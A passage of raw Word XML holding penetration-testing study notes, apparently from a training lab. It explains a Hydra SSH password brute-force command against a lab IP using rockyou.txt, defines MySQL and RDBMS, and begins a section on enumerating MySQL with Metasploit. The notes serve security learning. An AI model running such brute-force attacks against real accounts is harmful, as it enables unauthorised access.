        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ex. Syntax: hydra -t 16 -l USERNAME -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/share/wordlists/rockyou.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 10.10.105.120 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="610355D1" w14:textId="5BAA79CE" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hydra – runs the tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360FB9D0" w14:textId="2286D855" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-t 16 – parallel connections to target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26074D" w14:textId="3D4067D8" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-l [user] – points to user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>who’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> account trying to be compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC8FD3" w14:textId="0A4D3855" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-P – path to dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76D8FD" w14:textId="590075F8" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – increased verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BA88FC" w14:textId="3FFBC6F2" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[machine IP] – target IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BFE91" w14:textId="04C56D8F" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00090055" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/protocol – sets the protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508B0B0" w14:textId="7C5E85F7" w:rsidR="00090055" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Find password, access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and explore target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51463DC7" w14:textId="2AE4DBB9" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Understanding MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CE05CD" w14:textId="2D7C2836" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What is MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F60BC" w14:textId="65A81ECF" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Relational database management system (RDBMS) based on structured query language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB2CA6E" w14:textId="259CE398" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584556A2" w14:textId="1CCA377C" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Persistent, organized collection of structured data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF50A3" w14:textId="192ADB5D" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RDBMS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E46F2" w14:textId="586757F9" w:rsidR="00133DE8" w:rsidRPr="0084205E" w:rsidRDefault="00133DE8" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Software or service used to create and manage databases based on a relational model</w:t>
      </w:r>
      <w:r w:rsidR="00AD66BE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">, organized as tables. Every table relates in some way to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD66BE" w:rsidRPr="0084205E">
        <w:t>each others</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD66BE" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> primary key or other key factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA6BFAE" w14:textId="7F3DDD11" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0356D263" w14:textId="0F34CB52" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MySQL is a brand name for popular RDBMS software implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022B7418" w14:textId="688A7718" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Client-server model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307C709" w14:textId="6FE10C15" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How does MySQL work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279982E2" w14:textId="542F4410" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Consists of server and utility programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452F5E7" w14:textId="50E27AB0" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Handles all database instructions like creating, editing, and accessing data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B898423" w14:textId="4176A7E7" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Receives and manages requests and communicates using MySQL protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00141EA4" w14:textId="59FB209E" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MySQL creates a database for storing and manipulating data, defining the relationship of each table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F3793" w14:textId="00D5F423" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Clients make requests by making specific statements in SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B039A8A" w14:textId="032BCFF9" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The server will respond to the client with whatever information has been requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D63522" w14:textId="197902AD" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>What runs MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52685C7F" w14:textId="780C38BC" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux, Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E982B4" w14:textId="330F7856" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Commonly used as </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>back end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73885BA2" w14:textId="76FBA518" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Essential component of LAMP stack (Linux, Apache, MySQL, PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF97C37" w14:textId="64C28E69" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="00AD66BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerating MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DE4A1C" w14:textId="1E1A241A" w:rsidR="00AD66BE" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>When you would begin attacking MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE7C9B1" w14:textId="0210655B" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Likely not going to be the first point for getting initial information about the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0CFEFE" w14:textId="5DA381E8" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Can attempt to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> but unlikely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB93C5" w14:textId="4739AC18" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BE379" w14:textId="1D938F00" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> have gained some initial credentials from enumerating other services used to enumerate and exploit MySQL service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1A2BB" w14:textId="56E64A32" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Assumption of the discovery “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>root:password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>” while enumerating subdomains of a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB94FBB" w14:textId="6BF7926E" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Typically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> after unsuccessful </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B97DD9" w14:textId="16804460" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBC448" w14:textId="584F4538" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Need MySQL installed on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741F534D" w14:textId="1E6FBCDE" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD652B" w14:textId="070650F4" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="006A357A" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C64FA" w14:textId="24BEB4D5" w:rsidR="006A357A" w:rsidRPr="0084205E" w:rsidRDefault="007E5FA9" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
